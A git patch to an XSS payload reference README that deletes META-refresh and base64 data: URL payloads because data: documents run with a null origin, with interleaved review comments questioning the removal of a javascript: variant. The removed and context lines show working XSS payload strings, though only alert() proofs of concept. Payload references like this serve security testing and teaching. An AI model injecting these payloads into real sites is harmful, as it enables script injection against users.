From 200a2d38d8625c2bc95710bb1e95bf86c754fb00 Mon Sep 17 00:00:00 2001
From: Anton Lopanitsyn <i@bo0om.ru>
Date: Mon, 11 Feb 2019 09:34:13 +0300
Subject: [PATCH] Fix fake xss

Actually, it is not XSS.

Running scripts like <a href="data:text/html,<script>alert(location.origin)</script>">clickme</a> gives a location.origin of "null".
---
 XSS injection/README.md | 18 ------------------
 1 file changed, 18 deletions(-)

diff --git a/XSS injection/README.md b/XSS injection/README.md
index ce68962..6169b46 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -122,18 +122,6 @@ you can also specify an arbitratry payload with 14.rs/#payload
 e.g: 14.rs/#alert(document.domain)
 ```
 
-XSS in META tag
-
-```javascript
-Base64 encoded
-<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
-
-<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
-
-With an additional URL
-<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
-```
-
 XSS in Hidden input
 
 ```javascript
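Review bot: The third removed payload, CONTENT="0; URL=http://;URL=javascript:alert('XSS');", uses a javascript: URL rather than a data: URL, so the null-origin argument in the commit message does not cover it. Either keep that entry under the "XSS in META tag" heading and drop only the two data:text/html;base64 lines, or extend the commit message to state why the javascript: variant is also being removed.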
@@ -162,12 +150,6 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```
 
-XSS using base64 encoded href data in a link
-
-```
-<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
-```
-
 ## XSS in wrappers javascript and data URI
 
 XSS with javascript:
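Review bot: The heading kept directly below the removed link entry, "XSS in wrappers javascript and data URI", still lists data URI as an XSS wrapper, which sits oddly with a change that drops data: payloads because location.origin is "null". Check the data: entries in that section (not visible in this hunk) against the same reasoning. Rather than deleting silently, consider adding a one-line note to the README that data: documents run with a null origin, so readers understand why these payloads do not reach the embedding site's origin.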